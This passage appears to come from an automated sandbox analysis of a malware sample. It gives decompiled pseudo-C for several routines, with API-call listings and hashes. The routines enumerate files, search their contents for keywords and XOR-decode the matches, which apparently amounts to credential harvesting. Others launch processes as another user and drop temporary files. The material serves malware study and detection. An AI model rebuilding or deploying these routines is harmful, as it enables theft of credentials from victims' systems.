        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 00419E61
          • Part of subcall function 004118EB: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041192A
          • Part of subcall function 004118EB: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00411951
          • Part of subcall function 004118EB: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041199B
          • Part of subcall function 004118EB: Sleep.KERNEL32(00000000,?,?), ref: 004119F8
          • Part of subcall function 004118EB: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00411A26
          • Part of subcall function 004118EB: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00411A38
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
        • String ID: #$&
        • API String ID: 3438805939-3870246384
        • Opcode ID: e4e6e4f32ba85d199864f80ec82fe6d5338144ade900ecc6c971a90c58a06d87
        • Instruction ID: deb6fce1a53d176f144bb4d1a94705dbf6ca73d78d1668b33070a51db5f41335
        • Opcode Fuzzy Hash: e4e6e4f32ba85d199864f80ec82fe6d5338144ade900ecc6c971a90c58a06d87
        • Instruction Fuzzy Hash: 2211C276E01218BADB20DB96DC49FDFBF78EF41314F00416AF605B6180D3785A86CBA5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E00413782(void* __eflags) {
        				signed int _v8;
        				char _v20;
        				char _v44;
        				char _v92;
        				void* __edi;
        				void* __esi;
        				void* _t17;
        				CHAR* _t27;
        				intOrPtr* _t28;
        				WCHAR* _t30;
        				struct HINSTANCE__* _t31;
        
        				_t30 =  &_v44;
        				E004128DB(0xe3, _t30);
        				_t31 = GetModuleHandleW(_t30);
        				if(_t31 != 0) {
        					_t27 =  &_v20;
        					E004128A5(0xe4, _t27);
        					_t28 = GetProcAddress(_t31, _t27);
        					if(_t28 == 0) {
        						L4:
        						_t17 = 0;
        						L6:
        						return _t17;
        					}
        					_v8 = _v8 & 0x00000000;
        					_t32 =  &_v92;
        					E004128DB(0xd5,  &_v92);
        					_push(0x1e6);
        					_push("0x022A3598");
        					if(E0040CF30( &_v8, _t32, 0x4000001) > 0) {
        						 *_t28(0, _v8, "#", 0x10040);
        						E0040C1C2(_v8);
        						_t17 = 1;
        						goto L6;
        					}
        					goto L4;
        				}
        				return 0;
        			}















        APIs
        • GetModuleHandleW.KERNEL32(?), ref: 00413799
        • GetProcAddress.KERNEL32(00000000,?), ref: 004137BB
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressHandleModuleProc
        • String ID: 0x022A3598
        • API String ID: 1646373207-2963996362
        • Opcode ID: f6c451ebe9f6ab5842b575ba48043c2d456ed474a9a6e69370e07fe662376cda
        • Instruction ID: 47cfbd91c1fcfddae60ada0b4406c75668d16a5039d252e2f693c1a17f020e89
        • Opcode Fuzzy Hash: f6c451ebe9f6ab5842b575ba48043c2d456ed474a9a6e69370e07fe662376cda
        • Instruction Fuzzy Hash: B901F9B6A00204B7DB107BA99C06BDF376C9B80715F000126FD01F7281DA7C9F8586A9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 81%
        			E0041153E(intOrPtr _a4, intOrPtr _a8) {
        				short _v524;
        				char _v1044;
        				void* __edi;
        				void* _t12;
        				void* _t20;
        				void* _t21;
        
        				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
        					L6:
        					return 0;
        				}
        				_t20 = 0;
        				while(1) {
        					_push(_a4);
        					_push(E0040D4FB());
        					_push(L"tmp");
        					_t19 =  &_v1044;
        					_t12 = E0040CEB5(_t11, 0x104,  &_v1044, L"%s%08x.%s");
        					_t21 = _t21 + 0x10;
        					if(_t12 == 0xffffffff) {
        						goto L6;
        					}
        					if(E00411A47(_t19, _a8,  &_v524) == 0 || E00411372(_a8, 0, 0) == 0) {
        						_t20 = _t20 + 1;
        						if(_t20 < 0x64) {
        							continue;
        						}
        						goto L6;
        					} else {
        						return 1;
        					}
        				}
        				goto L6;
        			}










        APIs
        • GetTempPathW.KERNEL32(000000F6,?), ref: 00411555
          • Part of subcall function 0040D4FB: GetTickCount.KERNEL32 ref: 0040D4FB
          • Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66
          • Part of subcall function 00411372: CreateFileW.KERNEL32(0040DC9C,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,004115B1,0040DC9C,00000000,00000000,0040DC9C,?), ref: 0041138C
          • Part of subcall function 00411372: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004115B1,0040DC9C,00000000,00000000,0040DC9C,?), ref: 004113AF
          • Part of subcall function 00411372: CloseHandle.KERNEL32(00000000,?,004115B1,0040DC9C,00000000,00000000,0040DC9C,?), ref: 004113BC
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
        • String ID: %s%08x.%s$tmp
        • API String ID: 3395140874-234517578
        • Opcode ID: 850554409c3d28c982c778a6f09d2be731c80e04231c914af887486a67ee691f
        • Instruction ID: 35eee9bc70af7ea577d04fbb3a676726587c29851ed08c152dde8d778c712c19
        • Opcode Fuzzy Hash: 850554409c3d28c982c778a6f09d2be731c80e04231c914af887486a67ee691f
        • Instruction Fuzzy Hash: AF01267110021876DE206B24CC06FEF3B6ADB82354F104233FE66B61F1C2799EC6969D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040FD96(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
        				short _v524;
        				void* __esi;
        				WCHAR* _t17;
        				intOrPtr _t25;
        				int _t27;
        
        				_t27 = 0;
        				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E0041151D( &_v524) != 0) {
        					_t17 = PathFindFileNameW( &_v524);
        					_t25 = _a4;
        					E0040C341(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
        					E0040C1FE(_t25, "?T", 2);
        					 *((char*)(_t25 + 2)) = 0x5c;
        					_t27 = 1;
        				}
        				return _t27;
        			}









        APIs
        • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 0040FDB8
          • Part of subcall function 0041151D: SetFileAttributesW.KERNEL32(00000080,00000080,00404F4A,?), ref: 00411526
          • Part of subcall function 0041151D: DeleteFileW.KERNEL32(?), ref: 00411530
        • PathFindFileNameW.SHLWAPI(?,?,?), ref: 0040FDDA
          • Part of subcall function 0040C341: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,0040D039,00000000,00000000,00000000,0040C39E,00000000,00000000,00000000,?,00000000), ref: 0040C35C
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
        • String ID: cab
        • API String ID: 2491076439-1787492089
        • Opcode ID: 74598aed3270a28b5a62dca0061675d265f38a07a9939cf1d4a270c5455f0110
        • Instruction ID: f6c5817c92eb3cb91a997eb5ad52e3afb35a880178f98fd193186e8a15de47a4
        • Opcode Fuzzy Hash: 74598aed3270a28b5a62dca0061675d265f38a07a9939cf1d4a270c5455f0110
        • Instruction Fuzzy Hash: FF01A77260021477CB209B69CC49F8B77AC9F45764F0047757D25F32D2D674EA488AE4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 84%
        			E0040B07E(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
        				void* _t13;
        				void** _t24;
        				void* _t27;
        
        				_t13 = _a4(_a8,  &_a8);
        				if(_t13 != 0) {
        					_t24 = E0040F8B1(__ecx, _a8);
        					if(_t24 != 0) {
        						if(EqualSid( *_t24, _a12) != 0) {
        							_t27 = _a8;
        							if(E0040CF30( &_a4, L"\"%s\"", _a16) > 0) {
        								E0040DAE4(_t27, _a4);
        								E0040C1C2(_a4);
        							}
        						}
        						E0040C1C2(_t24);
        					}
        					return CloseHandle(_a8);
        				}
        				return _t13;
        			}







        APIs
          • Part of subcall function 0040F8B1: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,0040D7FB,?,?,?,00412F92,000000FF,004238B0), ref: 0040F8CA
          • Part of subcall function 0040F8B1: GetLastError.KERNEL32(?,?,0040D7FB,?,?,?,00412F92,000000FF,004238B0,?,?,00000000), ref: 0040F8D0
          • Part of subcall function 0040F8B1: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,0040D7FB,?,?,?,00412F92,000000FF,004238B0), ref: 0040F8F6
        • EqualSid.ADVAPI32(00000000,0000000C,?,0040B1F7,?,0040B1D8,00423900,?,00000000,00413BEE,?,?), ref: 0040B0A3
          • Part of subcall function 0040DAE4: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 0040DAF5
          • Part of subcall function 0040DAE4: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0040DB14
          • Part of subcall function 0040DAE4: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0040DB20
          • Part of subcall function 0040DAE4: CreateProcessAsUserW.ADVAPI32(?,00000000,0040B0D2,00000000,00000000,00000000,0040B0D2,0040B0D2,00000000,?,?,?,00000000,00000044), ref: 0040DB91
          • Part of subcall function 0040DAE4: CloseHandle.KERNEL32(?), ref: 0040DBA4
          • Part of subcall function 0040DAE4: CloseHandle.KERNEL32(?), ref: 0040DBA9
          • Part of subcall function 0040DAE4: FreeLibrary.KERNEL32(?), ref: 0040DBC0
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        • CloseHandle.KERNEL32(?,?,0040B1F7,?,0040B1D8,00423900,?,00000000,00413BEE,?,?), ref: 0040B0E4
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
        • String ID: "%s"
        • API String ID: 4035272744-3297466227
        • Opcode ID: 8b5be02412ebe7e020a9184c5dbb9d8bf6b17f147aa32a717a31295769b8c990
        • Instruction ID: a90065773485ca39b45e4dec26d4fcff7d62d8b4c296a90a9959f676471db286
        • Opcode Fuzzy Hash: 8b5be02412ebe7e020a9184c5dbb9d8bf6b17f147aa32a717a31295769b8c990
        • Instruction Fuzzy Hash: C9F01D36100109BBCF116F61DC45ADF3B69EF44355B048136FC18B91A1DB39CA60DB98
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040E28B(intOrPtr __eax, void* __eflags) {
        				long _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				intOrPtr _v32;
        				intOrPtr _v36;
        				char* _v40;
        				intOrPtr _v44;
        				intOrPtr _v48;
        				intOrPtr _v52;
        				char _v56;
        				void* __edi;
        				intOrPtr _t26;
        
        				_t26 = 0;
        				_v56 = 0x101;
        				_v52 = 0;
        				_v48 = __eax;
        				_v44 = E0040E20A();
        				_v40 = "http://www.google.com/webhp";
        				_v36 = 0;
        				_v32 = 0;
        				_v28 = 0;
        				_v24 = 0;
        				_v20 = 0;
        				_v16 = 0x80000;
        				_v12 = 0;
        				_v8 = GetTickCount();
        				if(E0040E0D8( &_v56, 0) != 0) {
        					_t26 = GetTickCount() - _v8;
        				}
        				E0040C1C2(_v44);
        				return _t26;
        			}



















        APIs
          • Part of subcall function 0040E20A: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040E21B
          • Part of subcall function 0040E20A: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040E22E
          • Part of subcall function 0040E20A: FreeLibrary.KERNEL32(?), ref: 0040E280
        • GetTickCount.KERNEL32 ref: 0040E2D0
          • Part of subcall function 0040E0D8: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 0040E12C
          • Part of subcall function 0040E0D8: InternetCloseHandle.WININET(00000000), ref: 0040E1C5
        • GetTickCount.KERNEL32 ref: 0040E2E2
        Strings
        • http://www.google.com/webhp, xrefs: 0040E2B0
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
        • String ID: http://www.google.com/webhp
        • API String ID: 2673491915-2670330958
        • Opcode ID: fd558edd8ca79384bb39ad1235537ea1e85c49bd8fbbe7aaf9dd8e24d3f0314f
        • Instruction ID: 98079edd6fece2fa1c4e826471535ca806014ba1bd791a286b2bc2fcded5e74d
        • Opcode Fuzzy Hash: fd558edd8ca79384bb39ad1235537ea1e85c49bd8fbbe7aaf9dd8e24d3f0314f
        • Instruction Fuzzy Hash: E301A8B1D112289ACF00EFEAD9854DEFBB8EF48758F10456BE800B7251D3B45A058FE9
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • GetFileSizeEx.KERNEL32(c A,c A,?,?,?,00412063,00000000), ref: 00411502
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: FileSize
        • String ID: c A$c A
        • API String ID: 3433856609-3029591421
        • Opcode ID: 935f1b20553e8c3b9bc8dfc9f493cc9ba07646f50b2327c7323d49c4f643c1c2
        • Instruction ID: 07554132ac8ec1690528f1cf5fbcf705285203e363a8ac323c6a2869270e0c33
        • Opcode Fuzzy Hash: 935f1b20553e8c3b9bc8dfc9f493cc9ba07646f50b2327c7323d49c4f643c1c2
        • Instruction Fuzzy Hash: 8DD05E7560010CBBAB05CB59CC05CDE7BBEAB80364B108265B512922A0E370EE819A68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E00419B82(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
        				char _v524;
        				char _v576;
        				char _v580;
        				char _v588;
        				intOrPtr _v608;
        				char _v612;
        				char _v620;
        				char _v628;
        				char _v632;
        				char* _v640;
        				signed int _v644;
        				char* _v648;
        				char** _v652;
        				intOrPtr _v656;
        				intOrPtr _v660;
        				char* _v664;
        				char* _v668;
        				char* _v672;
        				char* _v676;
        				void* __edi;
        				void* __esi;
        				signed int _t82;
        				char* _t83;
        				intOrPtr _t85;
        				char** _t101;
        				char* _t112;
        				char* _t121;
        				char* _t122;
        				void* _t123;
        				char* _t126;
        				char* _t127;
        				char* _t156;
        				void* _t157;
        				signed int _t166;
        				char* _t167;
        				char** _t168;
        				intOrPtr _t170;
        				char* _t171;
        				signed int _t172;
        				void* _t174;
        
        				_t174 = (_t172 & 0xfffffff8) - 0x294;
        				if(E00411A47( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
        					L31:
        					return 1;
        				}
        				_t177 =  *__edx & 0x00000010;
        				if(( *__edx & 0x00000010) == 0) {
        					_push( &_v524);
        					_t82 = 2;
        					_t83 = E004113D7(_t82,  &_v524,  &_v612);
        					__eflags = _t83;
        					if(_t83 == 0) {
        						goto L31;
        					}
        					_t85 = E0040CA5D(_v608,  &_v652, _v612, 1, 0);
        					_v660 = _t85;
        					__eflags = _t85 - 0xffffffff;
        					if(_t85 == 0xffffffff) {
        						L30:
        						E0041147F( &_v612);
        						goto L31;
        					}
        					_v640 = E0040C192(0x622);
        					E004128A5(0x91,  &_v588);
        					E004128A5(0x92,  &_v628);
        					E004128A5(0x93,  &_v620);
        					E004128A5(0x94,  &_v576);
        					__eflags = _v640;
        					if(_v640 == 0) {
        						L29:
        						E0040C1C2(_v640);
        						E0040C1DE(_v652, _v656);
        						goto L30;
        					}
        					_v644 = 0;
        					__eflags = _v648;
        					if(_v648 > 0) {
        						do {
        							_t166 = _v644;
        							_t101 = _v652;
        							__eflags =  *(_t101 + _t166 * 4);
        							if( *(_t101 + _t166 * 4) == 0) {
        								goto L28;
        							}
        							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
        							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
        							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
        							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
        							__eflags = _v676;
        							_t167 = _t112;
        							if(_v676 == 0) {
        								goto L28;
        							}
        							__eflags = _v672;
        							if(_v672 == 0) {
        								goto L28;
        							}
        							__eflags = _t167;
        							if(_t167 == 0) {
        								goto L28;
        							}
        							_v676 =  &(_v676[8]);
        							_v672 =  &(_v672[6]);
        							_t168 =  &(_t167[0xa]);
        							_v652 = _t168;
        							E00419B68();
        							E00419B68();
        							E00419B68();
        							__eflags = _t156;
        							if(_t156 == 0) {
        								L15:
        								_t157 = 0x15;
        								L16:
        								__eflags =  *_v676;
        								if( *_v676 == 0) {
        									goto L28;
        								}
        								__eflags =  *_v672;
        								if( *_v672 == 0) {
        									goto L28;
        								}
        								_t121 =  *_t168;
        								__eflags = _t121;
        								if(_t121 == 0) {
        									goto L28;
        								}
        								__eflags = _t121 - 0x30;
        								if(_t121 == 0x30) {
        									L21:
        									__eflags = _t168[0];
        									if(_t168[0] == 0) {
        										goto L28;
        									}
        									L22:
        									_t122 = 0;
        									__eflags =  *_t168;
        									if( *_t168 == 0) {
        										goto L28;
        									} else {
        										goto L23;
        									}
        									do {
        										L23:
        										_t122[_t168] = _t122[_t168] ^ 0x00000019;
        										_t122 =  &(_t122[1]);
        										__eflags = _t122[_t168];
        									} while (_t122[_t168] != 0);
        									__eflags = _t122;
        									if(_t122 > 0) {
        										_t169 =  &_v580;
        										_t123 = 0x57;
        										E004128DB(_t123,  &_v580);
        										_push(_t157);
        										_push(_v676);
        										_t158 = _v656;
        										_push(_v652);
        										_push(_v672);
        										_t126 = E0040CEB5(_t169, 0x311, _v656, _t169);
        										_t174 = _t174 + 0x14;
        										__eflags = _t126;
        										if(_t126 > 0) {
        											_t170 = _a4;
        											_t127 = E0040C5B6(_t126, _t170, _t158);
        											__eflags = _t127;
        											if(_t127 != 0) {
        												_t68 = _t170 + 4;
        												 *_t68 =  &(( *(_t170 + 4))[1]);
        												__eflags =  *_t68;
        											}
        										}
        									}
        									goto L28;
        								}
        								__eflags = _t121 - 0x31;
        								if(_t121 != 0x31) {
        									goto L22;
        								}
        								goto L21;
        							}
        							_v648 =  &(_t156[6]);
        							E00419B68();
        							_t157 = E0040C841(_v648,  &_v588, 0);
        							__eflags = _t157 - 1;
        							if(_t157 < 1) {
        								goto L15;
        							}
        							__eflags = _t157 - 0xffff;
        							if(_t157 <= 0xffff) {
        								goto L16;
        							}
        							goto L15;
        							L28:
        							_v644 = _v644 + 1;
        							__eflags = _v644 - _v648;
        						} while (_v644 < _v648);
        					}
        					goto L29;
        				} else {
        					_t171 =  &_v612;
        					E004128DB(0x90, _t171);
        					_v648 = _t171;
        					E004118EB( &_v524,  &_v648, _t177, 1, 5, E00419B82, _a4, 0, 0, 0);
        					goto L31;
        				}
        			}












































        APIs
          • Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66
        • StrStrIA.SHLWAPI(?,?,?,00000001,00000000,?,?), ref: 00419CA8
        • StrStrIA.SHLWAPI(?,?), ref: 00419CBA
        • StrStrIA.SHLWAPI(?,?), ref: 00419CCA
        • StrStrIA.SHLWAPI(?,?), ref: 00419CDC
          • Part of subcall function 004118EB: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041192A
          • Part of subcall function 004118EB: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00411951
          • Part of subcall function 004118EB: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041199B
          • Part of subcall function 004118EB: Sleep.KERNEL32(00000000,?,?), ref: 004119F8
          • Part of subcall function 004118EB: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00411A26
          • Part of subcall function 004118EB: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00411A38
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
        • String ID:
        • API String ID: 1075381090-0
        • Opcode ID: dd2c59ebd71306c572155ef6f10906c76fcf95d770ad236024411802279dd860
        • Instruction ID: 9f4d4553a39ce0701a27e46dc92aa61c4821babf1040abc4b15b35ef7126e2c0
        • Opcode Fuzzy Hash: dd2c59ebd71306c572155ef6f10906c76fcf95d770ad236024411802279dd860
        • Instruction Fuzzy Hash: 9471D1315083419FD720EF29D841ADFB7E5AF88714F440A1EF498A72A2D738DD86CB5A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00409E2F(intOrPtr _a4) {
        				intOrPtr _v8;
        				void* __esi;
        				void* _t13;
        				signed int _t19;
        				signed short _t26;
        				signed int _t30;
        				void* _t37;
        
        				_t37 = E0040CD11(_a4);
        				if(_t37 > 0x3e8) {
        					EnterCriticalSection(0x422988);
        					E0040C1C2( *0x42297c);
        					 *0x42297c =  *0x42297c & 0x00000000;
        					 *0x422984 = 0;
        					LeaveCriticalSection(0x422988);
        					return 0;
        				}
        				EnterCriticalSection(0x422988);
        				_t26 = ( *0x422984 & 0x0000ffff) + _t37;
        				if(_t26 <= 0x3e8) {
        					_t13 = E0040C14D(_t26 + _t26, 0x42297c);
        					if(_t13 != 0) {
        						_t30 =  *0x42297c; // 0x0
        						_t13 = E0040C1FE(_t30 + ( *0x422984 & 0x0000ffff) * 2, _a4, _t37 + _t37);
        						 *0x422984 = _t26;
        					}
        				} else {
        					_t13 = E0040C14D(0x7d0, 0x42297c);
        					if(_t13 != 0) {
        						_t18 = 0x3e8 - _t37;
        						_t19 =  *0x42297c; // 0x0
        						E0040C1FE(_t19, _t19 + (( *0x422984 & 0x0000ffff) - 0x3e8 - _t37) * 2, 0x3e8 - _t37 + _t18);
        						_t13 = E0040C1FE(0x3e8 - _t37 + _t18 +  *0x42297c, _v8, _t37 + _t37);
        						 *0x422984 = 0x3e8;
        					}
        				}
        				LeaveCriticalSection(0x422988);
        				return _t13;
        			}


        APIs
        • EnterCriticalSection.KERNEL32(00422988,?,?,?,0040A122,?), ref: 00409E4C
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        • LeaveCriticalSection.KERNEL32(00422988,?,?,?,0040A122,?), ref: 00409E6D
        • EnterCriticalSection.KERNEL32(00422988,?,?,?,?,0040A122,?), ref: 00409E7E
        • LeaveCriticalSection.KERNEL32(00422988,?,?,?,0040A122,?), ref: 00409F17
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$EnterLeave$FreeHeap
        • String ID:
        • API String ID: 1946732658-0
        • Opcode ID: f7461d231d4e5d7b77a163a21d17db0db8f6c6dbe6d802cddd775a2eb052a579
        • Instruction ID: ed9fe413805121567e921b954cfbadebe557b0c43dd790c97f33963efacdd76c
        • Opcode Fuzzy Hash: f7461d231d4e5d7b77a163a21d17db0db8f6c6dbe6d802cddd775a2eb052a579
        • Instruction Fuzzy Hash: B821C5B1301106FBC720AFA4EE8497A7369AF85304F44417BF401A71B2DBB84846EF5E
        Uniqueness

        Uniqueness Score: -1.00%